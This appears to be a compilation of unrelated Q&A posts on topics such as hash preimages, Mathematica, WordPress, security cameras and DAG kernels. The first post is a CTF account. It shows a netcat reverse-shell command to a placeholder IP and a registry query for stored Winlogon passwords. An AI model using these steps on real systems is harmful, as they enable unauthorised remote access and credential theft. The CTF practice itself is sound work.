PowerShell (WinRM) and cmd.exe: reg query output deviation

During a CTF I encountered the following anomaly regarding PS & cmd.exe:

  • I got access to a Windows x86 server through WinRM Port 5985 using evil-winrm. (https://github.com/Hackplayers/evil-winrm) This spawns a PS shell.
  • Via the PS shell I transferred nc.exe to the machine and used cmd.exe /c "nc.exe IP PORT -e cmd.exe" to spawn an additional regular cmd.exe shell back to me.

I searched the registry for stored passwords using the following command: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

This is where I noticed that the PS shell reg query returns considerably more output than the cmd.exe reg query. PS includes the “DefaultPassword” entry, whereas cmd.exe does not include this value.

The full output deviation is captured in the following screenshot:

[Screenshot: reg query on PowerShell shows more entries than reg query on cmd.exe]

The same behavior is observable for other registry items. PS generally returns more elements than the cmd.exe “sub-shell”.

Any hints to why this behavior occurs are greatly appreciated.

Is there necessarily an infinite number of inputs to any given output in a crypto hash function? [migrated]

This might be a very easy question. Let’s consider cryptographic hash functions with the usual properties, weak and strong collision resistance and preimage resistance.

For any given output, obviously there are multiple inputs. But is that necessarily an infinite number of preimages, for any given hash value?

How would I go about giving a formal proof that there exists no crypto hash function h() such that there is a given value v = h(m*) for which the possible set of inputs m* is finite? Would this necessarily break collision resistance?

Output of Two Functions as a Single Function

I have two functions: One of which outputs a number and the other outputs a picture. What I would like to do is create a single function that would output both the number and the picture.

As a MWE take the following:

Tri = Triangle[{{0, 0}, {0, 1}, {1, 0}}]
PictureTest[x_, y_, z_] :=
  RegionPlot[x >= z*y && {x, y} \[Element] Tri, {x, 0, 1}, {y, 0, 1}]
MinTest[x_, y_, z_] :=
  Minimize[{x, x >= y + z && {x, y} \[Element] Tri}, {x, y}]

I would like to create a new function NewFunc[x_,y_] that gives as an output both PictureTest[x,y,z] and MinTest[x,y,z]. (Or even better if it added some words and gave PictureTest[x,y,z] and “the minimum is MinTest[x,y,z].”)

(This might seem silly given the specific functions above. But I’m working with more complicated functions and z is in fact many variables. So, in practice, I’d like to input “z” once and get the answer to both PictureTest and MinTest. I imagine the answer is in the Mathematica documentation, but I don’t quite know what I am looking for. I’m not even sure if I’m using the correct tags.)

How can I validate that a PRNG’s output is insecure and predictable?

Say I talk to a developer who is using some output of a Pseudo-random number generator in order to do some security task. I know based upon common knowledge that only Cryptographically Secure Pseudo Random Numbers should be used.

However, I want to take this a step further – how would I create a proof-of-concept that the current method is not secure? I would guess that I need a large collection of outputs from this particular PRNG algorithm… But aside from that, I have no idea what else I would need to do. Is there a way for me to use a cryptanalysis tool to derive the seed or salt (assuming there is one)? How can I prove or disprove that such a PRNG is predictable using security auditing tools and/or scripts?

How do I control the output of a custom post type in the loop?

I’m working on a new content type. Let’s call it hotel rooms (it is not but the similarities are good enough).

Now, for each room, I will have a title and a description but I will also have a lot of metadata – beds, sea view, room number, size, summer price, winter price, and so on.

I would like my custom type to work on any theme. That means I need to provide a way to lay out the post for index.php, single.php, and so forth. Obviously, presenting metadata is a large part of this.

How do I do this?

Do 4k IP security cameras with uncompressed 4k video output exist? [closed]

Are there any companies selling IP security cameras that produce uncompressed 4k RAW video output (to NVR, or even to local sd-card)? Almost all popular brands compress using H.265 (HEVC) which works great for many reasons (network bandwidth, storage, playback, remote streaming, on and on).

However, my local network resources are not limited by bandwidth, storage, processing power and I’d really love to find a camera that, at the least, saves a lossless 4k version of the video output, maybe to internal sd-card in case of later investigation requiring higher resolution/quality version. I’ve been searching around for about a week now, in various subs here and other places like Security on StackExchange, Discord, forums, etc.

For those that are more list-oriented, I’m looking for something with the following traits:

  • 4k video output, minimum 8 MP uncompressed @ ~32Mbps bitrate (at least to internal sd-card)
  • Wired RJ45/Ethernet connection, with POE.
  • Compatibility with Home Assistant / Blue Iris software
  • Supports ONVIF protocol.
  • Decent viewing angle, but definitely not wide (e.g. not > 180 deg, etc).

I really haven’t found anything out there that meets these criteria, so any suggestions appreciated.

Algorithm for finding an irreducible kernel of a DAG in O(V*e) time, where e is number of edges in output

An irreducible kernel is the term used in Handbook of Theoretical Computer Science (HTCS), Volume A “Algorithms and Complexity” in the chapter on graph algorithms. Given a directed graph G=(V,E), an irreducible kernel is a graph G’=(V,E’) where E’ is a subset of E, and both G and G’ have the same reachability (i.e. their transitive closures are the same), and removing any edge from E’ would not satisfy this condition, i.e. E’ is minimal (although not necessarily the minimum size possible).

A minimum equivalent graph is similar, except it also has the fewest number of edges among all such graphs. Both of these concepts are similar to a transitive reduction, but not the same because a transitive reduction is allowed to have edges that are not in E.

HTCS says that there is an algorithm to calculate an irreducible kernel of a directed acyclic graph in O(V*e) time, where V is the number of vertices, and e is the number of edges in the irreducible kernel, i.e. the output of the algorithm. The reference given for this is the following paper, which I have not been able to find an online source for yet (links or other sources welcome — I can ask at a research library soon if nothing turns up).

Noltemeier, H., “Reduction of directed graphs to irreducible kernels”, Discussion paper 7505, Lehrstuhl Mathematische Verfahrenforschung (Operations Research) und Datenverarbeitung, Univ. Gottingen, Gottingen, 1975.

Does anyone know what this algorithm is? It surprises me a little that it includes the number of edges in the output graph, since that would mean it should run in O(n^2) time given an input graph with O(n^2) edges that represents a total order, e.g. all nodes are assigned integers from 1 up to n, and there is an edge from node i to j if i < j. That doesn’t seem impossible, mind you, simply surprising.
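An added illustration of the definition above, not part of the original question and not claimed to be Noltemeier's algorithm: a straightforward way to compute an irreducible kernel of a DAG, run on the total-order example from the question. The function names are hypothetical; the set-union work is done once per kept edge, with a membership test for every input edge.

```python
from graphlib import TopologicalSorter

def irreducible_kernel(succ):
    """succ maps each node of a DAG to its successors; returns the kept edges."""
    graph = {u: set(vs) for u, vs in succ.items()}
    for vs in list(graph.values()):
        for v in vs:
            graph.setdefault(v, set())
    # Feeding successors in as "predecessors" yields sinks first, so every
    # successor of u is processed before u. Raises CycleError on a cycle.
    rev_order = list(TopologicalSorter(graph).static_order())
    pos = {u: i for i, u in enumerate(rev_order)}
    desc, kept = {}, set()
    for u in rev_order:
        reached = set()
        # Visit successors earliest-in-topological-order first (largest pos).
        for v in sorted(graph[u], key=pos.get, reverse=True):
            if v in reached:
                continue          # already reachable via a kept edge: redundant
            kept.add((u, v))
            reached.add(v)
            reached |= desc[v]    # one union per kept edge
        desc[u] = reached
    return kept

def reachability(edges):
    """Transitive closure as a set of (u, v) pairs; used only for checking."""
    adj = {}
    for u, v in edges:
        adj.setdefault(u, set()).add(v)
    closure = set()
    for start in adj:
        stack, seen = list(adj[start]), set()
        while stack:
            v = stack.pop()
            if v not in seen:
                seen.add(v)
                stack.extend(adj.get(v, ()))
        closure |= {(start, v) for v in seen}
    return closure

def total_order(n):
    """Constructed input: nodes 1..n with an edge i -> j whenever i < j."""
    return {i: set(range(i + 1, n + 1)) for i in range(1, n + 1)}

if __name__ == "__main__":
    print(sorted(irreducible_kernel(total_order(6))))
```
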